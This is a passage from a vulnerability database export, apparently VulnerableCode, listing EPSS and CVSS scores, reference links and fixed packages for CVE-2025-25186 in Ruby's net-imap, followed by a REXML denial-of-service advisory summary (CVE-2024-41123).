scoring_system	epss
scoring_elements	0.33263
published_at	2026-04-11T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.33259
published_at	2026-04-09T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.33225
published_at	2026-04-08T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.33182
published_at	2026-04-07T12:55:00Z

value	0.00135
scoring_system	epss
scoring_elements	0.3335
published_at	2026-04-04T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-25186

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/ruby/net-imap

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/net-imap

reference_url

https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/

url

https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35

reference_url

https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/

url

https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3

reference_url

https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/

url

https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022

reference_url

https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3
scoring_elements

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/

url

https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69

reference_url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2025-25186.yml

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2025-25186.yml

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-25186

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-25186

reference_url

https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html

reference_url

https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html

reference_url

https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103791
reference_id	1103791
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103791

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2344680
reference_id	2344680
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2344680

reference_url

https://github.com/advisories/GHSA-7fc5-f82f-cx69

reference_id

GHSA-7fc5-f82f-cx69

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-7fc5-f82f-cx69

reference_url	https://access.redhat.com/errata/RHSA-2025:10217
reference_id	RHSA-2025:10217
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:10217

reference_url	https://access.redhat.com/errata/RHSA-2025:3906
reference_id	RHSA-2025:3906
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:3906

reference_url	https://access.redhat.com/errata/RHSA-2025:4493
reference_id	RHSA-2025:4493
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4493

reference_url	https://access.redhat.com/errata/RHSA-2025:8131
reference_id	RHSA-2025:8131
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:8131

reference_url	https://usn.ubuntu.com/7418-1/
reference_id	USN-7418-1
reference_type
scores
url	https://usn.ubuntu.com/7418-1/

fixed_packages

url	pkg:deb/debian/ruby3.3@3.3.8-1?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.8-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.8-1%3Fdistro=trixie

url	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.8-2%3Fdistro=trixie

aliases CVE-2025-25186, GHSA-7fc5-f82f-cx69

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wyjh-cuuy-zbeb

url VCID-yj1t-rga1-x3ev

vulnerability_id VCID-yj1t-rga1-x3ev

summary

REXML DoS vulnerability
### Impact

The REXML gem before 3.3.2 has some DoS vulnerabilities when it parses an XML that has many specific characters such as whitespace character, `>]` and `]>`.

If you need to parse untrusted XMLs, you may be impacted to these vulnerabilities.

### Patches

The REXML gem 3.3.3 or later include the patches to fix these vulnerabilities.

### Workarounds

Don't parse untrusted XMLs.

### References

* https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh : This is a similar vulnerability
* https://github.com/ruby/rexml/security/advisories/GHSA-4xqq-m2hx-25v8 : This is a similar vulnerability
* https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41123/: An announce on www.ruby-lang.org

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-41123.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-41123.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2024-41123

reference_id

reference_type

scores

value	0.00232
scoring_system	epss
scoring_elements	0.45952
published_at	2026-05-12T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.45925
published_at	2026-05-11T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46108
published_at	2026-04-11T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46086
published_at	2026-04-08T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46143
published_at	2026-04-16T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46088
published_at	2026-04-13T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46079
published_at	2026-04-12T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46084
published_at	2026-04-09T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46061
published_at	2026-04-02T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46082
published_at	2026-04-04T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.4603
published_at	2026-04-07T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.45982
published_at	2026-05-09T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.45963
published_at	2026-05-07T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.45899
published_at	2026-05-05T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46139
published_at	2026-04-18T12:55:00Z

value	0.00239
scoring_system	epss
scoring_elements	0.46966
published_at	2026-04-24T12:55:00Z

value	0.00239
scoring_system	epss
scoring_elements	0.4698
published_at	2026-04-21T12:55:00Z

value	0.00239
scoring_system	epss
scoring_elements	0.46928
published_at	2026-04-29T12:55:00Z

value	0.00239
scoring_system	epss
scoring_elements	0.46977
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2024-41123

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41123
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41123

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url